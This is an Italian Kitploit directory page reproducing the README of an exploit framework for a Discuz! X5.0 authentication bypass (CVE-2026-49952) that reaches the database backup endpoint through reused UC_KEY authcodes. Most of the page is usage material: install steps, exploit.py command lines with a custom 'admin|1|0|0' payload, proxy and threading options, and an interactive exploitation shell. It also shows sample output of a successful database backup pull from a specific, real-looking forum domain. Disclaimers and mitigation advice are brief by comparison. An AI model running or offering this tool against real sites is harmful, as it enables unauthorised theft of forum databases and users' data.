Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - Vulnerabilità critica che consente l'accesso non autenticato ai backup del database tramite il riutilizzo dei token dell'oracolo di cifratura UC_KEY. CVSS 9.1. Strumento completo con rilevamento della versione, attacchi multi-payload, shell interattiva e sfruttamento automatizzato. Solo per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
Autenticazione e AutorizzazioneFramework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

Vedi Repository
121 mese faNon ancora revisionato

Informazioni

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - Vulnerabilità critica che consente l'accesso non autenticato ai backup del database tramite il riutilizzo dei token dell'oracolo di cifratura UC_KEY. CVSS 9.1. Strumento completo con rilevamento della versione, attacchi multi-payload, shell interattiva e sfruttamento automatizzato. Solo per test autorizzati.

Condividi

Discuz! X5.0 Framework di Exploit per il Bypass dell'Autenticazione

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (Critico) | Versione 1.0.0

Uno strumento professionale di penetration testing progettato per identificare e dimostrare la critica vulnerabilità di bypass dell'autenticazione in Discuz! X5.0.

D1

📋 Indice dei Contenuti

  • ⚠️ Disclaimer

  • 🔍 Panoramica

  • 🎯 Dettagli della Vulnerabilità

  • ✨ Caratteristiche

  • 📦 Installazione

  • 🚀 Avvio Rapido

  • 💻 Esempi di Utilizzo

  • 🖥️ Shell Interattiva

  • 🛡️ Considerazioni sulla Sicurezza

  • 🔧 Risoluzione dei Problemi

  • 📄 Licenza


⚠️ Disclaimer

AVVISO IMPORTANTE Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati. NON utilizzare questo strumento su sistemi di cui non sei proprietario o per i quali non disponi di esplicita autorizzazione al test. L'accesso non autorizzato ai sistemi informatici è illegale e antietico. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento. Utilizzando questo strumento, accetti di conformarti a tutte le leggi e normative applicabili.


🔍 Panoramica

Discuz! X5.0 Authentication Bypass Exploit Framework è progettato per identificare e dimostrare la critica vulnerabilità di bypass dell'autenticazione (CVE-2026-49952) nelle versioni di Discuz! X5.0 rilasciate tra il 20 marzo 2026 e il 1 maggio 2026.

Questa vulnerabilità consente ad aggressori non autenticati di accedere alla funzionalità di backup del database (dbbak.php) sfruttando l'oracolo di crittografia UC_KEY per il riutilizzo dei token, esponendo potenzialmente contenuti sensibili del database.

Punti Chiave

  • 🏆 Punteggio CVSS: 9.1 (Critico)

  • 🔐 Impatto: Bypass dell'autenticazione

  • 📂 Accesso: File di backup del database

  • ⚡ Complessità: Bassa (facile da sfruttare)

  • 🎯 Bersaglio: Discuz! X5.0 (20260320 - 20260501)


🎯 Dettagli della Vulnerabilità

Riepilogo Tecnico

Causa Principale

La vulnerabilità risiede nell'endpoint dbbak.php, dove il meccanismo di validazione del token si basa sull'oracolo di crittografia UC_KEY. Creando un payload specifico nella richiesta di login (member.php), un aggressore può ottenere un token di autenticazione valido che può essere riutilizzato per accedere alla funzionalità di backup del database senza un'autorizzazione adeguata.

Versioni Interessate

  • ❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerabile

  • ✅ Discuz! X5.0 (20260510+) - Corretta


✨ Caratteristiche

Funzionalità Principali

  • 🔍 Rilevamento della versione: Fingerprinting automatico e identificazione della versione di Discuz!.

  • ⚡ Attacco multi-payload: Test parallelo di multiple varianti di payload.

  • 🖥️ Shell interattiva: Interfaccia a riga di comando completa per lo sfruttamento manuale.

  • 🚀 Sfruttamento automatizzato: Sfruttamento con un clic e configurazione minima.

  • 📊 Salvataggio dei risultati: Esporta i risultati dello sfruttamento in file con timestamp.

  • 🌐 Supporto proxy: Configurazione proxy HTTP/HTTPS per l'attraversamento di rete.

  • 🎯 Scansione multi-thread: Numero di thread configurabile per l'ottimizzazione delle prestazioni.

  • 🎨 Output a colori: Output del terminale professionale con codifica a colori.

Funzionalità Avanzate

  • 🔐 Supporto SSL/TLS: Gestisce target sia HTTP che HTTPS.

  • 🔄 Gestione delle sessioni: Mantiene lo stato della sessione persistente.

  • 📦 Personalizzazione del payload: Supporto per l'iniezione di payload personalizzati.

  • 🎯 Validazione del target: Verifica l'installazione di Discuz! prima dello sfruttamento.


📦 Installazione

Prerequisiti

  • Python: Versione 3.7 o superiore

  • Pip: Gestore dei pacchetti Python

Installazione dal Sorgente

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Installazione con Docker

root@kitploit:~
# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 Avvio Rapido

Utilizzo di Base

root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

Utilizzo Avanzato

root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 Esempi di Utilizzo

Esempio 1: Sfruttamento di Base

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 Output previsto
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ Shell Interattiva

Avvia la shell interattiva per lo sfruttamento manuale:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

Comandi Disponibili


🛡️ Considerazioni sulla Sicurezza

✅ Cosa Fare

  • Utilizzare solo su sistemi di cui sei proprietario o per i quali hai esplicita autorizzazione al test.

  • Ottenere autorizzazione scritta prima di effettuare test.

  • Seguire le pratiche di divulgazione responsabile.

  • Segnalare le vulnerabilità ai fornitori in modo appropriato.

  • Utilizzare in ambienti di laboratorio isolati per l'apprendimento.

❌ Cosa Non Fare

  • Non utilizzare mai su sistemi di produzione senza autorizzazione.

  • Non condividere pubblicamente dati ottenuti tramite exploit.

  • Non utilizzare mai per attività illegali o furto di dati.

  • Non modificare o eliminare dati durante i test.

  • Non sfruttare mai senza consenso.

Raccomandazioni di Mitigazione

Per gli amministratori di sistema:

  1. Aggiorna immediatamente: Esegui l'upgrade a Discuz! X5.0 (20260510+) o versioni successive.

  2. Disabilita l'endpoint: Disabilita temporaneamente dbbak.php se non necessario.

  3. Monitora i log: Controlla accessi sospetti a member.php e dbbak.php.

  4. Regole WAF: Implementa regole Web Application Firewall per bloccare richieste dannose.

  5. Whitelist IP: Limita l'accesso all'endpoint di backup agli IP affidabili.


🔧 Risoluzione dei Problemi

❌ Errori di connessione
root@kitploit:~
Error: Failed to connect to target

Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
🚫 Autenticazione non riuscita
root@kitploit:~
Error: Authentication failed or invalid authcode

Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details

📄 Licenza

Questo progetto è concesso in licenza sotto la MIT License.

Copyright © 2026 Sudeepa Wanigarathna

Con la presente è concessa gratuitamente a chiunque ottenga una copia di questo software e dei relativi file di documentazione (il "Software") l'autorizzazione a utilizzare il Software senza restrizioni, inclusi, a titolo esemplificativo ma non esaustivo, i diritti di utilizzare, copiare, modificare, fondere, pubblicare, distribuire, concedere in sottolicenza e/o vendere copie del Software, e di consentire alle persone a cui il Software è fornito di fare altrettanto, alle seguenti condizioni:

L'avviso di copyright sopra riportato e il presente avviso di autorizzazione devono essere inclusi in tutte le copie o parti sostanziali del Software.

IL SOFTWARE È FORNITO "COSÌ COM'È", SENZA GARANZIE DI ALCUN TIPO, ESPRESSE O IMPLICITE, INCLUSI, A TITOLO ESEMPLIFICATIVO MA NON ESAUSTIVO, LE GARANZIE DI COMMERCIABILITÀ, IDONEITÀ PER UN PARTICOLARE SCOPO E NON VIOLAZIONE. IN NESSUN CASO GLI AUTORI O I TITOLARI DEL COPYRIGHT SARANNO RESPONSABILI PER QUALSIASI RECLAMO, DANNO O ALTRA RESPONSABILITÀ, SIA IN UN'AZIONE CONTRATTUALE O ILLECITA, SIA DERIVANTE DA, IN CONNESSIONE CON IL SOFTWARE O L'USO O ALTRE OPERAZIONI CON IL SOFTWARE.


Autore: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ Se trovi utile questo strumento, ti preghiamo di considerare di lasciare una stella!

🔐 Usa in modo responsabile. Sii etico. Continua a imparare.

Scarica lo strumento
AttributoDettagli
Tipo di vulnerabilitàBypass dell'autenticazione
ID CVECVE-2026-49952
Versione CVSS3.1
Punteggio CVSS9.1 (Critico)
Vettore di attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiNessuno
Interazione dell'utenteNessuna
Impatto sulla riservatezzaAlto
Impatto sull'integritàAlto
Impatto sulla disponibilitàAlto
Maturità del codice exploitFunzionale
Livello di remediationFix ufficiale disponibile
ComandoDescrizioneEsempio
helpMostra tutti i comandi disponibilihelp
scanRileva la versione di Discuz! e verifica la vulnerabilitàscan
get [payload]Estrae l'authcode (payload personalizzato opzionale)`get admin
exploit [op]Esegue l'exploit (predefinito: backup)exploit backup
saveSalva i risultati su filesave
infoMostra le informazioni della sessioneinfo
clearPulisce lo schermo del terminaleclear
exit / quitEsce dalla shell interattivaexit